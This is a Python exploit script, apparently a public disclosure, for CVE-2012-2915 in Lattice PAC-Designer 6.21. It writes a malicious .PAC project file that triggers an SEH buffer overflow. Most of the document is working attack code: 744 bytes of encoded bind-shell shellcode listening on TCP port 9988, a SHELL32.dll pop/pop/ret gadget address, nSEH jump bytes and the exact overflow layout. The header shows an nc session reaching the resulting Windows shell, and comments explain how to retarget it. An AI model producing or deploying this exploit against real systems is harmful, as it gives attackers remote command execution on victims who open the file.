
# Title : Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
# Published : 2012-06-07
# Author : b33f (Ruben Boonen)


#!/usr/bin/python

#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)           #
# CVE: CVE-2012-2915                                                                 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                        #
# OS: WinXP SP1                                                                      #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig too deep, but porting to other OS builds looks unpromising: the      #
# SEH gadget below lives in SHELL32.dll (an OS module, so its address is tied to    #
# this exact build and SafeSEH gets in the way on others) and the application's     #
# own modules contain bad characters.                                               #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                             #
#  (UNKNOWN) [192.168.111.130] 9988 (?) open                                         #
#  Microsoft Windows XP [Version 5.1.2600]                                           #
#  (C) Copyright 1985-2001 Microsoft Corp.                                           #
#                                                                                    #
#  C:\Documents and Settings\Owner\Desktop>                                        #
#------------------------------------------------------------------------------------#

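filename = "evil.PAC"

# PAC1/PAC2 wrap the payload in an otherwise well-formed PAC-Designer project so
# the application parses all the way to <Value>; the over-long <Value> text is
# the only attacker-controlled field here and is what triggers the overflow
# (CVE-2012-2915, see header).
#
# Everything is built as bytes and written in binary mode. The shellcode starts
# with non-ASCII bytes (0x89 0xe3 0xd9 ...); a text-mode write under Python 3
# would re-encode those as UTF-8 and a Windows text-mode write would translate
# newlines, either of which silently shifts the SEH layout below.
PAC1 = b"""<?xml version="1.0"?>

<PacDesignData>

<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>

<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>

<SymbolicSchematicData>
  <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                          #
#------------------------------------------------------------------------------------#
# Bind shell on TCP/9988, 744 bytes. Note that the alpha_mixed encoder still emits a #
# handful of non-alphanumeric leading bytes (presumably its GetPC stub) -- re-check  #
# them against the application's bad characters if you retarget this.               #
#------------------------------------------------------------------------------------#
shellcode = (
    b"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
    b"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
    b"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
    b"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
    b"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
    b"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
    b"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
    b"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
    b"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
    b"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
    b"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
    b"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
    b"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
    b"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
    b"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
    b"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
    b"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
    b"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
    b"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
    b"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
    b"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
    b"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
    b"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
    b"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
    b"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
    b"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
    b"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
    b"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
    b"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
    b"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
    b"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
    b"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
    b"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
    b"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
    b"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
    b"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
    b"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
    b"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
    b"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
    b"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
    b"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
    b"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
    b"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x4d\x6d\x39\x6f\x6a\x75\x65"
    b"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
    b"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
    b"\x70\x30\x53\x79\x6f\x68\x55\x41\x41"
)

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                            #
# nSEH: \xEB\x05 (jmp short +5, over the handler address into the NOP sled)          #
#------------------------------------------------------------------------------------#
# Layout of the <Value> text (offsets established on WinXP SP1, see header):         #
#   [98 x "A"][nSEH][SEH][20 x NOP][shellcode][ "C" padding to 5000 bytes ]          #
# The gadget sits in SHELL32.dll, an OS module, so 0x77512879 is only valid on that  #
# exact Windows build; retargeting means finding a new pop/pop/ret.                  #
#------------------------------------------------------------------------------------#
NSEH = b"\xEB\x05"
SEH = b"\x79\x28\x51\x77"       # 0x77512879, little-endian

b00m = b"\x90" * 20 + shellcode
payload = b"A" * 98 + NSEH + SEH + b00m + b"C" * (5000 - len(b00m))

PAC2 = b"""</Value>
  </Symbol>
</SymbolicSchematicData>

</PacDesignData>"""

buffer = PAC1 + payload + PAC2

if __name__ == "__main__":
    # Binary mode: no newline translation and no re-encoding of the high bytes.
    with open(filename, "wb") as out:
        out.write(buffer)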